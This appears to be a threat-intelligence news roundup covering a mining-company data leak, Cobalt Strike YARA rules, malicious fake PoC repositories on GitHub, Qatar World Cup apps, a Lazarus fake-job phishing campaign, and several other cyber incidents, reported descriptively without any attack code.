A threat actor advertises data of a Turkish gold mining company called Anagold in breached.co. breached.co is a forum created as an alternative to raidforums.com.
Anagold is a mining company which is a partner of Canadian SSR Mining company and has gold mines in Turkey. In the past months, there have been allegations of cyanide leaks in Turkey regarding the mining company.
According to the threat actor’s post, they are now sharing only 8GBs of data for now and more will be shared later. This data is also including some survey maps of gold reserves.
The company has not yet made a statement about the allegations.
Cobalt Strike is a legitimate, commercial penetration testing tool mostly used by red teams and for security trainings. However, it is widely used as cracked by threat actors for intrusion and lateral movement in their victims’ networks.
Google Cloud has released some open source YARA rules for detecting Cobalt Strike components dating back to 2012. This Yara rules set is including 165 detection signatures to scan more than 300 different Cobalt Strike binaries.
“We are releasing to the community a set of open-source YARA Rules and their integration as a VirusTotal Collection to help the community flag and identify Cobalt Strike’s components and its respective versions. Since many threat actors rely on cracked versions of Cobalt Strike to advance their cyberattacks, we hope that by disrupting its use we can help protect organizations, their employees, and their customers around the globe” Google Cloud said in their post.
Cobalt Strike includes several features like discovery, payload creation, MS Office macro creation, website cloning, and so on. Many threat actors in the field have been observed using Cobalt Strike.
In recent years, it is very common to share PoC exploits for known vulnerabilities. It is very common to easily find several PoCs for vulnerabilitirs in GitHub. A researcher team from Leiden Institute of Advanced Computer Science announced that they discovered thousands of repositories on GitHub that offer fake PoC exploits for multiple vulnerabilities.
The discovery is including vulnerabilities discovered between 2017 and 2021. For these vulnerabilities, the team analyzed 47313 repositories and discovered that 4893 of them were malicious repositories. These repositories were used by threat actors to spread malware. The researchers analyzed a total of 358277 IP addresses, 150734 of them were unique IPs and 2864 were blacklisted.
A given example for fake PoC is for the CVE-2019-0708 vulnerability. “This repository was created by a user under the name Elkhazrajy. The source code contains a base64 line that once decoded will be running. It contains another Python script with a link to Pastebin28 that will be saved as a VBScript, then run by the first exec command. After investigating the VBScript we discovered that it contains the Houdini malware” written in the document the team provided.
It seems like this fake PoCs will go on for both newly discovered and legacy vulnerabilities. Even if PoCs are not malicious, these PoCs are making exploitations accessible for public and also for less experienced attackers also. So, as soon as a vulnerability is discovered, it is very likely to be exploited until it is patched. Because of this situation, security teams need to prioritize and patch critical vulnerabilities faster. This also shows the importance of using a professional intelligence service for prioritizing vulnerabilities according to organization’s threat profile that detected by the intelligence service again.
Qatar is the first Arabic country that will host World Cup and also this year is an exception for World Cup since it will be done in winter. It will be hosted from 20th of November to 18th of December.
Surely, World Cup is one of the biggest sport organizations in the world and thousands of football fans all over the world are planning to join this organization. However Qatar requires visitors to install two different applications on their mobile phones.
As the news, according to Øyvind Vasaasen, Head of Security at NRK, visitors must not bring their mobile phones to Qatar.
One of the must-install applications is Ehteraz. It is a Covid-19 tracking application and required for visitors older than 18. This application is tracking users’ location. It was used for infected individuals to enforce quarantine during Covid-19 in Qatar. It was also discovered that the app wants permission to “read, delete or change all content on the phone, as well as access to connect to WiFi and Bluetooth, override other apps and prevent the phone from switching off to sleep mode.
The other must-install application is Hayya. It is an application helping visitors to get their tickets and also giving access to free metro service in Qatar. Similarly, Hayya can get visitors’ location and also view network connections.
It seems like with installing these two applications, you give the people who control the apps the ability to read your data in your phone, and control it. It can also give a chance to retrieve information from other applications in the phone.
There seems to be a significant increase in incidents resulting from fake job postings. It seems that the widespread use of remote work after Covid has an effect on this. These fake ads – job scams – often manage to attract employees with remote working conditions and high salaries.
Lastly, North Korean APT38 (aka Lazarus) group targeted employees with fake job posting emails. The attackers were impersonating the Coinbase company and their emails appeared to be coming from Coinbase. Coinbase is one of the world’s biggest and most popular cryptocurrency exchanges.
Subject: BITCOIN JOB OPPORTUNITY
Not familiar with BITCOIN? Then this is an opportunity for you to learn & make money. COINBASE COMPANY ( A secure platform that makes it easy to buy, sell, and store cryptocurrency like Bitcoin, Ethereum) seek INDIVIDUALS who can VISIT at least “one” BITCOIN ATM every week for survey. Weekly pay is $350. No specific time required as long as work is completed in a timely manner. For more information’s, Please Email Coordinator Brian at (external email address) for more information NOTE: Candidates should email (only) with their PERSONAL EMAIL Address for consideration. Sincerely,
How is it working?
What you see above is an example of an email sent by the North Korean group under the name Coinbase. Attackers firstly create fake job postings on LinkedIn and fake websites exactly the same of the original website and directs victims to these fake websites via LinkedIn and emails. When the victim gets an email after applying the job in the fake website. These emails may contain harmful files or sometimes attackers go on with social engineering with having job interviews with the victims.
Also, fake SMS is another common method. Attackers are sending SMS that appears to be from HR managers of companies.
A threat actor, called ‘4c3’ selling access to a central bank. The threat actor did not disclose the name of the bank.
The ad posted today, in exploit.in website. The threat actor did not disclose the name of the bank but gave some information like the bank has Symantec as EDR and around 10k machines, mostly running Windows. The bank is using Flexcube database too.
The threat actor is claiming that she/he can give VPN access for the central bank and all passwords of domain dump.
The threat actor announced that she/he is not giving the name of the bank publicly and she/he can give it only via private chat.
exploit.in is a very popular Russian undergroun hacking forum.
Large-scale cyber attacks against the electronic information resources of Azerbaijan have been prepared.
The Center for Combating Computer Incidents of the State Service of Special Communication and Information Security of Azerbaijan released information about this.
“The Center for Combating Computer Incidents of the Special Communication and Information Security State Service (XRITDX) monitors cyber attacks against our country 24/7 and successfully prevents DDOS and other types of cyber attacks against state information resources since 03.05.2022.”
“XRITDX calls on state and non-state information resource administrators, as well as our citizens, to be careful and vigilant against phishing attacks.”
Today, posts about Azerbaijan in many Russian telegram channels attracted attention. It is mentioned that the threat actor will attack to government targets of Azerbaijan for a few weeks.
Later, the sharing of information about some of Azerbaijan’s airports and important gas station networks in Telegram groups drew attention too.
We will try to share the developments on the subject as soon as possible.
Solana announced that an attack affected more than 7700 wallets. The exploit affected several wallets, including Slope and Phantom.
Experts recommend that affected wallets should be transferred to cold wallets, and for those who do not have cold wallet, transferring all fund to a centralized exchange will be a good option.
Analysts says that technique of the attack is still unknown and a bug may cause this instead of Solana blockchain itself. A 0-day vulnerability seems more possible to gain access to such a large number of private keys.
According to Elliptic, blockchain analyzer, $5.8 Million crypto asset stolen just in August, including SOL, USD and NFT.
In may, we announced that The Department of State is offering a reward of up to $10M for information leading to the identification and/or location of any leaders of the Conti ransomware group. Additional $5M reward for any information conspiring Conti.
On 25th of July, The Department of State increased the reward to $15M for information that could identify Conti members. Additional $5M offering for data that will allow to arrest the members is also still existing.
After many companies sanctioned Russia, Cisco announced that it would leave Russia in June. According to CNews, illegal Cisco licenses appeared on sale in Russia after this decision.
It is mentioned that there are several methods to use Cisco licenses illegally. There are cases when a government agency hacked a Cisco product with the help of an external company. It was stated that cryptocurrency is another method for obtaining licenses.
Russian integrator Ramek-VS provides a service called UNLIC openly and calls it “the return of the stability of the Cisco infrastructure.”
Ramek-VS also guarantees complete confidentiality and the absence of legal risks in the Russian legal field.
To talk about how this is done technically, one of the sources of these licenses are purely hacking activities. And the second method is that they are registering these licenses somewhere in China or Montenegro not like Russian equipment, but as if to be used in Montenegro.